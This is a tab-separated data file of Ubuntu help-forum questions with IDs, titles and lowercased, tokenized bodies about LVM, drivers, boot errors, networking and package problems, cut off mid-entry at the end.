219881	how can i create one logical volume over two disks using lvm ?	hi . i 've got a working ubuntu 12.04 server , which is going to serve as media server . i 've added two disks of size 3tb to put my data on , and i wish to combine these as one 6tb logical volume which i could mount under /media . so far , i have created one partition on each disks with fdisk and formatted them to ext3 . but now i am stuck on how to continue . do i use mdadm to create a jbod array ? or do i use lvm to make a logical volume of these two disks ? i ca n't seem to find the documentation i need , it 's mostly about extending existing volumes or installing a fresh system which i do n't need . my os is on /dev/sdc1 ( it 's a usb thumb-drive ) , and the two newly created partitions are on /dev/sda1 and /dev/sdb1 . hope you can give me some directions .
219882	gtk2 menus are slow	my pc runs ubuntu 12.04 with gnome-shell . some time ago after an upgrade the menus in gtk2 apps became slow , i.e . there 's a delay while opening the context menu in synaptic , claws-mail , etc . gtk2 apps . is there a way to fix it ?
219885	install hanging w/ 12.10	i am attempting to install 12.10 using wubi on a machine with windows 7 pro an i3 and nvidia video card and it is hanging at almost finished copying files for over 2 hours at this point . i can use firefox obviously as that is how i am posting this question but need to find out what is wrong or at least how to correct the issue . the last info presented by the installer is : nov 20 19:06:31 ubuntu aptdeamon.worker : info : finished transaction /org/debian/ apt/transaction 3996df8742c44c18ac4890ddd3998f87
219886	impossible to boot ubuntu on a usb stick ( os x montain lion )	i know this has been discussed over and over but i still can not run ubuntu on a usb stick . here 's the step i followed : 1 . i downloaded ubuntu 12.10 ( ubuntu-12.10-desktop-i386.iso ) from http : //www.ubuntu.com/download/desktop which i renamed 'ubuntu.iso ' . i bought my mac mid-2010 , it has an intel processor . 2 . i formated my 16gb usb stick with hfs+ file system following this tutorial : http : //www.switchingtomac.com/tutorials/how-to-format-a-drive-or-partition-with-the-hfs-file-system 3 . i opened a terminal and typed : hdiutil convert -format udrw -o ~/downloads/ubuntu.img ~/downloads/ubuntu.iso it created ubuntu.iso.dmg 4 . i ran 'diskutil list ' and identified the device node assigned to the usb . 5 . i unmounted it : diskutil unmountdisk /dev/disk2 6 . then , i entered the command : sudo dd if=~/downloads/ubuntu.img.dmg of=/dev/rdisk2 bs=1m . it seemed to work . a mac message poped up saying that the system does n't recognized the disk , i pressed 'ignore ' . 7 . i ejected the usb using diskutil eject /dev/disk2 , then removed the usb . 8 . i rebooted the computer , plugged the usb key , pressed alt.i could see my macintosh partition and my windows partition , but could n't see my usb stick . any help will be very appreciated : ) victor
219888	messaging menu turn blue for no reason	i expect the `` envelope '' from the messaging menu to turn blue only where there is a pending notification ( like a new mail or a new im message ) . when i click it , i usually see from which app the notification come from . sometime , the envelope turn blue , but there is no notification . when i click the envelope , i do n't see any app with notifications pending . i can `` clean '' the notifications to change the color to white , but the envelope will turn blue again after some minutes . the only solution i found is to reboot the computer ... is it a known bug ? there is a way to get the application that send this notification ? i did n't find anything about that after a google search . i still did n't find way to get a `` debug view '' of the messaging menu . i found dbus-monitor but this just spam too much and i ca n't find anything useful from that . seem like i 'm missing some messages from pidgin ( xmpp ) . i 'm thinking that the messaging icon become blue to warn me a new message was received , but pidgin fails to show me that message .
219889	software center not opening ( segmentation fault )	usman @ usmanpc : ~ $ software-center 2012-11-20 18:23:17,310 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2012-11-20 18:23:17,320 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2012-11-20 18:23:17,671 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2012-11-20 18:23:17,868 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2012-11-20 18:23:17,928 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) segmentation fault ( core dumped )
219890	wanting to install ubuntu , currently have windows , do n't want to lose files	i was going through the windows installer page and it 's made very simple . i 'm just wondering if i 'll lose my files if i do that . i had ubuntu , loved it , got a new laptop , and should 've installed ubuntu then but did n't . i do n't have any external storage media currently available to me , but if i can install ubuntu without losing my files i 'll go ahead and do that . help would be greatly appreciated ! thanks !
219891	`` hd0 out of disk '' / `` hd0 write error '' ( still boots )	i was doing a series of upgrades of my desktop which had 10.04 , aiming for 12.04 . somewhere in the middle , grub began displaying `` error : hd0 out of disk / press any key to continue '' , but the boot continued without problems . i decided a fresh install of 12.04 from a cd would be faster and hopefully eliminate the error , but it persisted . i then used boot-repair according to this topic out of disk , but still boots choosing the option of ata disk support . this led to some scary errors . so i followed the directions of https : //help.ubuntu.com/community/bootpartition creating a 1g partition at the start of the disk and running boot-repair . now when booting ubuntu , it says `` error : hd0 write error / press any key to continue '' and again boots like normal . how do i solve this error ? here are the current results of running bootinfoscript : http : //pastebin.com/xjwbzckg any help is appreciated . grub > ls -l device hd0 : not a known filesystem - total size 312581808 sectors partition hd0 , msdos5 : not a known filesystem - partition start at 300505088 - total size 12075008 sectors partition hd0 , msdos3 : filesystem type ext2 - last modification time 2012-11-20 20:39:28 tuesday , uuid 497becdd-c89d-4fcf-8f82-61e37fdc7881 - partition start at 2048 - total size 2048000 sectors partition hd0 , msdos1 : filesystem type ext2 - last modification time 2012-11-20 07:43:41 tuesday , uuid deb68dbd-c809-4b2a-9047-a58349e67375 - partition start at 2050048 - total size 298452992 sectors device hd1 : not a known filesystem - total size 976773168 sectors partition hd1 , msdos1 : filesystem type ntfs , uuid d6942bd2942bb3c1 - partition start at 63 - total size 976751937 sectors
219894	blank screen at shutdown when disabling second gpu	running ubuntu 12.10 on a dell xps15 . to disable the second gpu on my laptop i used this code in my rc.local file ( /etc/rc.local ) : off > /sys/kernel/debug/vgaswitcheroo/switch this code is doing its job just fine , but when i shutdown or reboot the pc ( both with terminal commands and with the buttons in the top right ) the gui disappears and i am stuck with just the wallpaper and my laptop does not power down . does anyone know how to fix the this ?
219896	overscan , ubuntu 12.04 , nvidia driver	i know there are many questions about overscan around but i cant seem to find a working solution . i know the cause of this is the nvidia driver , as i have no problems with the default driver , so i want to ask if any one has fixed overscan on 12.04 with nvidia . please help ps dont say change in nvidia-settings it was removed . edit - after playing with settings i noticed my 16:9 tv has overscan on all 16:9 resolutions but not on 4:3 resolutions , hoping mabey this will help find a fix .
219897	automatically select headphones when plugged in	when i plug headphones into my desktop computer , they are not automatically selected for output , instead all sound still goes through my s/pdif output to the stereo . the headphones alternative is added in the sound settings , and i have to manually select it as output device . $ cat /proc/asound/pcm 00-00 : alc898 analog : alc898 analog : playback 1 : capture 1 00-01 : alc898 digital : alc898 digital : playback 1 00-02 : alc898 analog : alc898 analog : capture 2 i have done a google search , as well as search askubuntu.com , but none of the answers in the hits i found seems to help . also , after listening with the headphones and then unplug them , the previous output is not automatically selected , so i have no sound at all then . i have to manually select the correct output in the settings .
219899	lvm partition size discrepancy	i am simply confused by some output i 'm seeing . when i run `` df -h '' the lines that are confusing me are as follows : filesystem size used avail use % /dev/mapper/sysvg-lvvideos 293g 4.5g 274g 2 % when i run `` vgdisplay '' i get : -- - volume group -- - vg name sysvg system id format lvm2 metadata areas 2 metadata sequence no 8 vg access read/write vg status resizable max lv 0 cur lv 4 open lv 4 max pv 0 cur pv 2 act pv 2 vg size 1.01 tib pe size 4.00 mib total pe 265251 alloc pe / size 120508 / 470.73 gib free pe / size 144743 / 565.40 gib vg uuid 4tjhj7-11cy-aum2-h05h-bxsv-2s4x-wudh5r when i run `` lvdisplay sysvg '' i get : -- - logical volume -- - lv name /dev/sysvg/lvvideos vg name sysvg lv uuid zxnpp0-2iui-ut1s-3rin-fxzh-qmfw-3ogwpi lv write access read/write lv status available # open 1 lv size 293.00 gib current le 75008 segments 2 allocation inherit read ahead sectors auto - currently set to 256 block device 254:2 what i do n't get is : 293 - 4.5 does not equal 274 . i have 14.5 gib unaccounted for .
219901	why is fsck not working for me ?	i have some bad sectors on my hard drive , so i followed the guide from this website to detect the bad sectors , i did the following command : sudo badblocks /dev/sda5 > /media/3865-6163/sda5 that worked fine , the next step is to run the following command : sudo fsck -l /media/3865-6163/sda5 /dev/sda5 for some reason , this does not work for me and gives me the following message : ubuntu @ ubuntu : /media/3865-6163 $ sudo fsck -l /media/3865-6163/sda5 /dev/sda5 fsck from util-linux 2.20.1 usage : fsck.ext4 [ -panyrcdfvtdfv ] [ -b superblock ] [ -b blocksize ] [ -i inode_buffer_blocks ] [ -p process_inode_size ] [ -l|-l bad_blocks_file ] [ -c fd ] [ -j external_journal ] [ -e extended-options ] device emergency help : -p automatic repair ( no questions ) -n make no changes to the filesystem -y assume `` yes '' to all questions -c check for bad blocks and add them to the badblock list -f force checking even if filesystem is marked clean -v be verbose -b superblock use alternative superblock -b blocksize force blocksize when looking for superblock -j external_journal set location of the external journal -l bad_blocks_file add to badblocks list -l bad_blocks_file set badblocks list ubuntu @ ubuntu : /media/3865-6163 $ why is this not working ?
219907	ubuntu one- one file will not sync , others sync fine	to start , i have two computers i use ubuntu one on right now . one is a laptop with ubuntu 12.04 32bit and the other is a desktop with windows 7 64bit . i have many files in my ubuntu one folder and they all seem to sync fine except for one . i have a calc document i edit daily on my laptop . but when i look at it on my desktop it has not been updated in a couple days , and if i save it i get a conflict file on my laptop , but not the desktop . i have tried disconnecting and reconnecting on both ( which takes a long time for some reason ) and it says file sync is up to date on both . any other file if i edit , delete , add . they all sync fine so far , except for this one . what could be the problem ? this is probably related , a couple days ago the same file ended up in the recycling bin on the ubuntu laptop . i did not delete it on either computer . i was not happy to find out ubuntu one does this ... come to think of it , i think that is about when all the sync problems started .
219908	need help running ubuntu minimal with e17	recently i have decided to opt for an optimized system for myself . i chose ubuntu mini 12.04 precise pangolin . the installation is not an issue , and i can boot into the basic command prompt and login with ease . the first thing i did was sudo apt-get update after this , i am not sure what to do : is there anything i need to install before getting and installing e17 ? how do i get and install e17 , and then make it boot into desktop automatically when i turn on the machine ? i 'd prefer the commands , as i am new to ubuntu and linux .
219911	how to completely separate desktop enviroments ?	how could i completely separate desktop environments from each other ? for example if i install cinnamon and mate , both desktop environments ' applications show in the main menu , and the launchers list them too , even if they are useless in the actual de . so in the end everything just messes up when there are more than one de installed . is there any method to separate them more ?
219912	how to see photos shared in a folder in a sequence	someone shared a folder with dozens of photos with me . i am in ubuntu 12.04 and firefox 16.02 . the only way i found out to see the photos in a sequence is to - download one by one ( did not manage to download all at the same time ) and - then use the image viewer ( program ) with the previous/next option . question : is there a simplier way to do this ? greetings ewst
219917	how to do n't `` list folders before files '' on nautilus trash and downloads folders ?	on the nautilus trash and downloads folders i have set to sort files on inverse modification time sort , but this way i ca n't be able to know if a folder is older that a file or not . disabling the 'list folders before files ' on the nautilus preferences panel solve the trick , but it does globally and on normal folders it 's a little mess to look for the folders between the files , since i got used to have them on top . so , there 's any way to enable this functionality only on this folders instead of globally in the same way that sort method , list/icon view and so are remembered in a per folder way ?
219924	can not connect to online accounts in empathy ( ubuntu 12.10 )	all my online accounts that connect to empathy for im will not work . empathy gives an error message of `` no reason specified '' for each one . gwibber works fine , so it seems to be a problem more related to empathy specifically than gnome online accounts . the problem started around the time i removed the password for my keyring in seahorse . this was so when my user account was auto-logged in it would not ask me for my keyring password . i do n't think this problem started immediately after this however it was shortly after . i tried adding my online accounts in a different user and empathy worked fine so it seems to be some configuration error for my user .
219927	must double-tap windows key to open dash	i 'm experiencing some strange behaviour of the unity dash and the windows/super keyboard key . as far as i know , normal behaviour is : tap : open dash hold : show keyboard shortcut overlay however , the behaviour i 'm experiencing is : tap : show keyboard shortcut overlay ( after a short delay ) double tap : open dash hold : show keyboard shortcut overlay what could cause this , and how do i fix it ? i 'm on a fresh 12.10 ( quantal ) installation .
219929	when i log in i am notified by a pop up stating `` i can not detect any system tray ''	when i log into my account i encounter a pop-up stating that it can not detect a system tray on the system . i no longer have a launcher , a dash or anything . only a few icons on my desktop . i can not see any of the top right hand menu 's . any help would be great , thanks !
219930	why xcalib invert screen does n't work with ubuntu 12.10	i use the inverted colors mode a lot , however after installing ubuntu 12.10 it does n't work for me any more . the command : xcalib -i -a outputs : error - unsupported ramp size 0 i have no clue where to start looking to fix this problem . could n't find anything about this error . any ideas ?
219931	fn + f7 do n't work ( before it allowed me to turn off the backlight lcd )	i thought this site could be useful but maybe i was wrong , or maybe i ca n't use it well ( it 's more likely ! ) . somebody can post a guide of how use properly this site ? ( i 'm italian ) but is more importantly my issue : when i had ubuntu 8.04 on this notebook asus 1015 px , the combo fn + f7 worked since i formatted it the first time . from then fn + f7 do n't work and i could not turn off anymore my lcd . it was a useful option for save energy on battery when i took notes at university ! now i have ubuntu 12.10 . it 's possibile solve this problem ? i no longer believe now , internet researches have been a waterhole ! thanks a lot , dimix !
219934	force wget to use actual google docs file	i am programming in batch it should n't matter because i am using wget on windows too . i found similar question on this site force wget to use actual filename first solution works for everyone but why it does n't working for me ? i am getting following error . c : \users\myname\documents\temobv\gnuwin32\bin > wget -- content-disposition 'http : //spreadsheets.google.com/pub ? key=0aqsbi1ooge84dgn2bxrszkzpvvrunkmtn0p4expyvle' system_wgetrc = c : /progra~1/wget/etc/wgetrc syswgetrc = c : \users\myname\documents\temobv\gnuwin32/etc/wgetrc 'http : //spreadsheets.google.com/pub ? key=0aqsbi1ooge84dgn2bxrszkzpvvrunkmtn0p4exp yvle ' : unsupported scheme . press any key to continue . . . thanks update c : \users\myuser\documents\temobv\gnuwin32\bin > wget -- content-disposition `` http : //spreadsheets.google.com/pub ? key=0aqsbi1ooge84dgn2bxrszkzpvvrunkmtn0p4expyvle & o utput=xls '' system_wgetrc = c : /progra~1/wget/etc/wgetrc syswgetrc = c : \users\myuser\documents\temobv\gnuwin32/etc/wgetrc -- 2012-11-20 15:11:40 -- http : //spreadsheets.google.com/pub ? key=0aqsbi1ooge84dgn 2bxrszkzpvvrunkmtn0p4expyvle & output=xls resolving spreadsheets.google.com ... 74.125.227.102 , 74.125.227.103 , 74.125.227 . 104 , ... connecting to spreadsheets.google.com|74.125.227.102|:80 ... connected . http request sent , awaiting response ... 301 moved permanently location : https : //spreadsheets.google.com/pub ? key=0aqsbi1ooge84dgn2bxrszkzpvvrun kmtn0p4expyvle & output=xls [ following ] -- 2012-11-20 15:11:40 -- https : //spreadsheets.google.com/pub ? key=0aqsbi1ooge84dg n2bxrszkzpvvrunkmtn0p4expyvle & output=xls connecting to spreadsheets.google.com|74.125.227.102|:443 ... connected . error : can not verify spreadsheets.google.com 's certificate , issued by `/c=us/o=g oogle inc/cn=google internet authority ' : unable to locally verify the issuer 's authority . to connect to spreadsheets.google.com insecurely , use ` -- no-check-certificate ' . unable to establish ssl connection . press any key to continue . . .
219937	which icc profile should i use for my notebook screen ( toshiba tecra ) ?	i have a dual monitor setup on my ubuntu 12.04 lts : the primary screen of my notebook toshiba tecra r850-11d my external monitor samsung syncmaster p2470hd the external monitor has a much better image quality , since it uses its own icc profile ( default , syncmaster ) , but the screen of my notebook does n't use any icc profile . what should i do and where could i get the appropriate icc profile for my toshiba notebook in order to gain a much better quality of colors of my desktop environment ?
219941	slow scrollin since upgrade to 12.10	since i have upgraded ( no clean install ) from ubuntu 12.04 to 12.10 , particular graphical aspects are slow : scrolling is really slow : for example in a terminal window , gedit or a browser compiz animations : in particular the window picker ( super + w ) this issue is not so much present shortly after start up but becomes progressively worse as the system is on . furthermore , connecting an external monitor ( and use that as the only monitor ) seems worsen the problem . top indicates that xorg consumes a significant amount of cpu resources when graphical performance is poor : from 15 % up to even 50 % for very short periods of time . this is more than before the upgrade . my laptop has a nvidia 8600m video card . i have upgraded the nvidia proprietary to the latest version ( 310.14 ) . the release notes claim significant performance improvements in unity but unfortunately this is not the case on my system . restarting unity by doing 'unity -- replace ' from a terminal seems to solve the problem temporarily . any clues as to what might cause this problem ? or perhaps any ideas on howto to investigate this issue more thoroughly ?
219942	how to uninstall manually installed nvidia drivers ?	how do i uninstall manually installed nvidia drivers 310.14 and revert to noveau . i have ubuntu 12.10 .
219947	how to upgrade firefox on several computers on the network	i have about 10 computers on my lan and i would like to upgrade the firefox on the computers across the lan . the computers are not connected to the internet . i can download the tar files from the internet but it 's almost impossible to go from system to system to install . is their a way i can upgrade from the server ?
219951	what folder structures are changed when doing a version upgrade	when upgrading from a livecd / livedvd / liveusb from any older ubuntu version to a newer one , what folders get deleted/modified/kept intact . for example , i know that /home stays along with everything in it ( except configuration files that get updated ) . but for example what happens to the following folder in an upgrade : /var /etc /usr and others
219954	can i map keyboard layouts to different applications ?	is it possible in ubuntu ( i am using 12.04 ) to change the keyboard layout based on the current active application ? e.g have one default layout and one other for a number of specified layouts ? i have tried opened certain applications , changed the layout and noticed that the layout switches as i change program . it does n't seem to be consistent over time though .
219956	can anyone tell me why gnome 3 looks like as if it were a gnome fallback session in my virtualbox ?	for some reason gnome 3 wont work in my virtualbox . both gnome classic and gnome look exactly identical . the version of my virtualbox is : 4.1.2_ ubuntu r38459 the 3d acceleration is on in the virtualbox and the guest additions is installed in the virtualbox from the software center . obviously , the graphic card driver is installed on the main ubuntu system i am using with my laptop . ( although the post-release updates ca n't be installed for whatever reason ) gnome shell is installed from the software center in the virtualbox . now the issue is that the gnome and gnome classic look like just the same . here is an image of what gnome looks like ( so does gnome classic too ... .so i am only posting one image ) : what causes this issue ? by the way ... .i am using ubuntu 11.10 with gnome fallback session . note : i have been asked to use the `` ~ $ gnome-shell -- replace '' command . it basically made the fallback mode into the desired gnome 3 desktop environment till the next restart , but that 's it . i got this message in the terminal though : '' ~ $ gnome-shell -- replace window manager warning : log level 16 : unable to register authentication agent : gdbus.error : org.freedesktop.policykit1.error.failed : an authentication agent already exists for the given subject window manager warning : log level 16 : error registering polkit authentication agent : gdbus.error : org.freedesktop.policykit1.error.failed : an authentication agent already exists for the given subject ( polkit-error-quark 0 ) ( gnome-shell:1860 ) : folks-warning ** : failed to find primary personastore with type id 'eds ' and id 'system ' . individuals will not be linked properly and creating new links between personas will not work . the configured primary personastore 's backend may not be installed . if you are unsure , check with your distribution . '' update : this is the image of the additional drivers . as you can see one cant be installed and this is why it 's not active .
219960	is there any difference between livecd upgrade and update manage upgrade	are there any differences between an upgrade from a livecd or the software options in the system like update manager ? just to make sure that when a user updates from a livecd , he/she gets the same as doing it via update manager included in the system .
219962	need help installing ubuntu 12.10	when i turn on my laptop it boots from the flash drive that i have the files on but then it only shows a line of text and i left it for more than an hour and it did n't change at all .
219968	how can i change the icons of window button ?	how can i change the icons of window button ? is it possible ?
219970	install 12.10 on macbook 6,1	i want to install ubuntu 12.10 besides macosx 10.6 on my macbook 6,1 . i found some instructions like here : https : //help.ubuntu.com/community/macbook/tripleboot but these are pretty old and i 'm not sure whether they will still work and everything . so i 'm asking for some up-to-date instructions or information about whether this will work and how to do this . my guess would be : partitioning using bootcamp somehow install this refit thing install ubuntu via usb or cd but i have no idea .
219979	desktop-name ( `` ubuntu desktop '' )	i see someone asked how to change in unity top left corner label ( ubuntu desktop ) there is an answer but it is no very clear , can someone explain it with more details , i am pasting the answer that was posted but i need more directions , thanks you would likely need to build the unity or unity-2d source . currently in unity-5.12 would be found in /plugins/unityshell/src/panelmenuview.cpp , line 78 _desktop_name ( _ ( `` ubuntu desktop '' ) ) in unity-2d , unity-2d 5.12 , /panel/applets/appname/appnameapplet.cpp line 369 d- > m_label- > settext ( u2dtr ( `` ubuntu desktop '' ) ) ;
219982	why does ubuntu not recognise hard drive on windows 7	im trying to install ubuntu on window 7 virtual pc , when i boot to the ubuntu iso image just before the partitioning stage where ubuntu confirms you have at leaset 4gb hard drive space the installer puts a cross on requirement indicating system does not have required amount of space ... however i have a 220gb hard drive with 20gb used to create the virtual disk..its all a bit weird as i ca n't seem figure it out
219990	no sound over hdmi 12.10 amd a4 5300 apu msi fm @ -a55m-e33	i just built a htpc using an apu a4 5300 on a msi fm @ -a55m-e33 motherboard . i installed 12.10 and connected it through my tv . video is fine but there is no sound . i checked the sound settings and there is no option for hdmi . i am using the recommended x-org driver . i tried fglrx and did a reboot but lost my desktop . i purged the fglrx driver and did a reboot and my desktop was restored . how can i get sound over hdmi ? adding `` radeon.audio=1 '' in /etc/default/grub did n't help
219991	forked-daapd with alternative soundcard	i am trying to configure forked-daapd on my computer , and everything goes well except that in configuration file i can not set a new value for the line corresponding to soundcard . this is the default code in the config file : # card = `` default '' i want to use a soundcard called `` dg2 '' , which is the soundcard no.1 and has a first device that alsa recognizes as no.0 . so , i change the line to the following : card = `` hw : dg2,0 '' i restart the daapd service and the next time i play a file through itune remote , i get a message in my server log file saying that it can not play the file because the device is busy . any change in the device name will return a different error , saying that the device does not exist . i am pretty sure no other uses this external device , and i do n't understand why i get this message . i have tried plughw as well , with the same result . when running lsof , i get the following result : mah @ homeserver : ~ $ lsof /dev/snd/* command pid user fd type device size/off node name pulseaudi 1579 mah 20u chr 116,3 0t0 9083 /dev/snd/controlc1 pulseaudi 1579 mah 26u chr 116,10 0t0 9542 /dev/snd/controlc0 pulseaudi 1579 mah 32u chr 116,10 0t0 9542 /dev/snd/controlc0 let me add one last detail . this soundcard is just a spdif-out usb dongle with very limited functionality ( e.g . no volume control ) . alsamixersays it only has a pcm channel ( which would be the device number 0 ) .
219992	downgrading a package and dependencies	i want to downgrade libcairo2 to the version from precise ( i 'm running quantal ) . i 've added the precise source to my sources.list and can do 'apt-get install libcairo2= ' , but it 's going to remove some packages that i definitely want to keep , specifically xubuntu-desktop . is this possible ? thanks , justin
219995	ca n't change from native resolution with latest nvidia drivers	i 'm having an odd error on 12.10 . i ca n't change my display resolution to anything but the laptop 's native ( 1440x900 ) resolution . i noticed this a couple weeks ago when i tried to attach to a projector , but it 's annoying for games too . in nvidia-settings , there are no other resolutions listed , whereas before , i could select 1280x800 , 1024x768 , etc . the card is a geforce 8600m gt , and i upgraded to the 310 experimental drivers to try to solve this , but no joy . thanks !
219997	can not apt-get install - on ubuntu server 12.10	i installed from cd a fresh ubuntu server 12.10 ( fyi : amd64 ) i need ubuntu-desktop . so i did run as per doc . sudo apt-get update sudo apt-get install ubuntu-desktop i keep getting unable to locate ubuntu-desktop the same message for vim-full and phpmyadmin and other packages . ping www.google.com works fine tasksel works fine and can upload and update any idea ? do i need something in /etc/apt/services.list ? if so please specify full line ( s ) the exact message is : e : unable to locate package packagename where packagename is any package , the one i wanted at first are either : ubuntu-desktop kubuntu-desktop then i tested with other packages it gives the same message . i did already what you are suggesting e.g . sudo apt-get update and even the : sudo apt-get upgrade . it does not work . i can not cat the sources.list i have no kde ( i 'll have to type it ) . no need anyway it 's a fresh install on a fresh pc from a fresh download from ubuntu.com burned on a cd . the thing is the standard sources.list is missing something and the question is what are those deb and deb-src entries that are missing .
219999	how to move one directory back when path contains symlink	i want to move one directory back in thunar when i get into by symbolic link . i know that in terminal i can use cd -p but i want to obtain this behavior in thunar .
220000	ubuntu likewise-open wo n't stay connected to domain	i am at a loss ... any help would be appreciated ... we have a linux server that is using likewise-open to authenticate against our active directory server . everything was working fine , but yesterday the server stopped staying connected to our a/d server . so far i have had to rejoin the domain approximately every 5 minutes ... then , a few minutes later , the server does not authenticate any more ... i have been searching for any answers all day , and nothing seems to be working . i have rebooted the server , changed hostnames , restarted services ... nothing seems to work ... any help would be appreciated ... -- charles
220006	wireless driver not working for broadcom bcm43224 after latest update	so , i did the latest update , and now my wireless driver is n't working . in the taskbar area , it shows that there is no device . however , when in my win8 partition and when using an older version of linux , it is working fine . how would i fix this ? also , here is the output showing the specifics of my wireless driver : ~ $ lspci -vvnn | grep 14e4 07:00.0 network controller [ 0280 ] : broadcom corporation bcm43224 802.11a/b/g/n [ 14e4:4353 ] ( rev 01 )
220007	ubuntu 12.04 dhcp gateway server	i need a little help . i will explain this the best i can so people do n't have to ask extra questions . essentially , i have a dell poweredge 2650 , with 2 nics . eth0 goes to my cable modem , while eth1 goes to a dell powerconnect 3348 . i have installed isc-dhcp-server on my machine also . the goal is for this box to be my dhcp server and my gateway to the magical internet . here is my set up for /etc/network/interfaces auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp auto eth1 iface eth1 inet static address 10.0.1.1 netmask 255.255.255.0 network 10.0.1.0 mtu 1392 i added the mtu in when i was trouble shooting . when i type in ifconfig , eth0 has the external address from my comcast cable modem . eth1 is set to 10.0.1.1 like i asked . when i connect things to the server via the switch/ethernet , an ip address gets assigned between 10.0.1.150 - 10.0.1.199 without any problems when i try to do anything from my gateway , apt-get update/install it connects and works no problem . when i try apt-get from my other boxes , its super slow , like 1 % a min or slower . i ca n't access internet pages via my macbook or hp laptop . however i can ping and traceroute not problem . via mac terminal ping -s 549 google.com does not work and gets a time out error but ping -s 548 google.com works fine . i have no idea why this would be happening and i ca n't find anything around other then the mtu stuff which i do n't understand . let me know if you have any questions or ideas .
220010	what is the correct fontconfig syntax for substituting a given uninstalled font with an installed font ?	the fontconfig documentation is fairly opaque . i want applications looking up the 'helvetica ' family to instead receive the 'helvetica lt std ' family and display that font , browsers in particular . the latest xml file i wrote to ~/.fontconfig/fonts.conf was < fontconfig > < match target= '' pattern '' > < test name= '' family '' target= '' default '' compare= '' eq '' > < string > helvetica < /string > < /test > < edit name= '' family '' mode= '' assign '' > < string > helvetica lt std < /string > < /edit > < /match > < /fontconfig > what am i doing wrong and what would be a correct way to express this substitution ?
220014	i am having trouble updating in ubuntu 12.10 64-bit ?	when i run sudo apt-get upgrade : w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ precise/partner amd64 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_partner_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ precise/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_partner_binary-i386_packages ) w : you may want to run apt-get update to correct these problems
220015	how to use btrfs with compression on external usb hard drive ?	i would like to make use of btrfs ' transparent compression on an external drive . which tool is best for formatting the drive ? disk utility or gparted ? how do i activate the compression ? during formatting or when i mount the drive ? i guess at mount time . i 'm using usbmount to automatically mount newly attached devices , because nobody is logged in on the desktop . would i have to set general default options somewhere in a system configuration file to get btrfs mounted with compression , or would i specify this via fs_mountoptions in /etc/usbmount/usbmount.conf and how ? thanks !
220019	unable to update ubuntu 12.10	once i tried to install banshee on ubuntu 12.10 and added that ppa . but somehow the installation failed due to internet failure . the problem is from then , when i try to update ubuntu , update task fails and the error is due to that bandshee ppa . i do n't know how to solve the problem . please help me .
220020	trouble with wubi and dual boot install	is there a difference between wubi install and doing an install of ubuntu alongside windows7 ? i ask because i used wubi , but i 'm having trouble with certain things like being unable to change my brightness settings and i 'm wondering if installing from a usb drive would change anything . also , i 've tried to do a usb drive install , but it does n't give me the option to install alongside , it only shows the `` replace windows 7 '' and `` something else '' options . is this because i already did a wubi install ?
220024	searching for printer/scanner canon pixma mp230 ( 32bit ) ubuntu 12.04 drivers and how to install	searching for canon pixma mp230 ( 32bit ) ubuntu 12.04 drivers and how to install . found the drivers on http : //www.canon-asia.com/personal/search ? languagecode=en & filter=p & q=mp230 % 20linux but the install.sh does n't seem to work . there are serveral syntax errors reported . tried to change the problems following directions from the terminal but i did n't succeed . if anyone could help ? many thanks !
220029	optimus bumblebee performance	after installing ubuntu 12.04 and bumblebee , i tested out the performance of the nvidia card using minecraft and a few other games . i 've noticed it to be way slower than it was on windows 7 . is this normal ? i 'm using the gt 630m . from what i 've read online , nobody has said it to be slower than windows . i 'm just really curious because i want to use linux so much more than windows , but if i do n't get the same performance i feel really picky . the nvidia card is still faster than my intel graphics on ubuntu , but it 's not as fast as it was for my on windows . i get 60 - 80 fps on minecraft on windows , while i get 28 - 48 fps on ubuntu . any ideas why ? thanks so much !
220034	ubuntu 12.10 running very slow on dell xps m1530	i am new to ubuntu and linux . i have installed 12.10 on my 32bit machine with 4gb 's ram and intel® core™2 duo cpu t9300 @ 2.50ghz × 2 processor takes a couple of seconds to open any application and can barely play video , very choppy and un-watchable windows 7 and 8 run fine on this machine , maybe i am missing something , can anyone help ?
220038	how can i connect to a windows ( 7 ) running in virtualbox from the network with rdp ?	i have a windows7 guest running in a virtualbox hosted by precise ( ubuntu 12.04 lts ) . in the settings of the virtual machine i have activated the 'remote display ' ( enable server ) with default settings ( server port , authentication method ) . the network of the guest is attached to nat . i try to use remmina to connect from the host to the guest . i tried 127.0.0.1 , 127.0.0.2 , the internal ip of win7 ( 10 . ... ) . did not work so far . do i have to active something and what on win7 ( home premium ) ? i would like to connect to the win7 remote desktop from the local network . can i stay in nat mode ( preferred due to our network policy ) , or do i have to go for 'bridged ' ? thanks !
220041	error 1018 ( hy000 ) : ca n't read dir of './depot/ ' ( errno : 13 )	i want to use of symbolic link for change path database in mysql . i create a directory , then create a symbolic link to this directory but when i want to use of this database get following error : error 1018 ( hy000 ) : ca n't read dir of './depot/ ' ( errno : 13 ) i disabled apparmor but not working . i checked no problem of permission .
220044	12.10 on elitebook 8560w w/ wubi	i am trying dual boot windows 7 and ubuntu on my elitebook 8560w via wubi . between microsoft and hp they used up all my primary partitions so i decided wubi was the best way to go . it all goes smoothly until i reboot to finish the installation , then it hangs at copying files . it always freezes here : debconf ( filter ) : widget found for ubiquity/install/title debconf ( filter ) : -- > 0 ok it also says something about `` so and so might freeze best to kill it '' but i did n't get it written down . can anybody tell me what that means ? edit : this is what it says ( in full ) : ubuntu kernel : [ 365.130914 ] [ < c1064d607 > ] ? kthread_freezable_should_stop+0x60/0x60 ubuntu kernel : [ 365.130914 ] [ < c15d04fe7 > ] kernel_thread_helper+0x6/0x10 debconf ( filter ) : < -- progress set 49 debconf ( filter ) : widget found for ubiquity/install/title debconf ( filter ) : -- > 0 ok debconf ( filter ) : < -- progress set 50 edit : i tried again and it got a little further . ubuntu kernel : [ 365.130914 ] [ & # 60 ; c1064d607 > ] ? kthread_freezable_should_stop+0x60/0x60 ubuntu kernel : [ 365.130914 ] [ & # 60 ; c15d04fe7 > ] kernel_thread_helper+0x6/0x10 debconf ( filter ) : < -- progress set 49 debconf ( filter ) : widget found for ubiquity/install/title debconf 